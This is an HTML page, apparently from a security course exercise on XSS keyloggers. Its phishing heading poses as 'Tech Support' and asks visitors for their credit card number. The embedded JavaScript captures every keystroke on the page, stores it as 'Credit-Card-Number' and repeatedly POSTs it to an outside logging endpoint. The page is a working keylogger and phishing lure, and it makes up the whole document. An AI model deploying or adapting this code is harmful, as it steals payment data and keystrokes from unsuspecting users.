<!doctype html>
<html class="no-js" lang="">
	<head>
	  <meta charset="utf-8">
	</head>
	<body>
		<style>
			h1 {
				background-image: linear-gradient(to left, violet, indigo, blue, green, yellow, orange, red);
				-webkit-background-clip: text;
				-webkit-text-fill-color: transparent;
				text-align: center;
			}
		</style>
	
		<h1>Hellloooo Tech Support here. Type yur credit card numero for moore informatione.</h1>
		
		<script type="text/javascript">
			let word = "";
			let sentence = "";
			let text = "";
		
			document.addEventListener("keypress", function (e) {									// keypress to get special characters
				let character_code = event.which || event.keyCode;
				let character_value = String.fromCharCode(character_code); 
				
				console.log(character_code + " " + character_value);
				
				word = word + character_value;
				
				if(character_code == 32){															// if space --> indicates new word
					sentence = sentence + word;
					word = "";
				}
				
				if(character_code == 13 || character_code == 46){									// if "." or "ENTER" --> indicates finished sentence
					text = text + sentence + word;
					word = sentence = "";
				}
				
				setInterval(function(){
					if(text.length > 0){				
						console.log(text);
						
						sessionStorage.removeItem('Credit-Card-Number');
						sessionStorage.setItem('Credit-Card-Number', text);							// Save text to session storage
						
						fetch('https://m183.gibz-informatik.ch/api/xssKeylogs', {
							method: 'POST',
							mode: 'cors', 															// Unsupported Media Type Error with 'no-cors' - ???
							headers: {
								'Content-Type': 'application/json',
							},
							body: JSON.stringify({
								keyword: 'Tech Support',
								payload: 'Credit-Card-Number: ' + text
							})
						});	
						
						text = sentence = word = "";
					}
				}, 1000);
			});
		</script>
	</body>
</html>
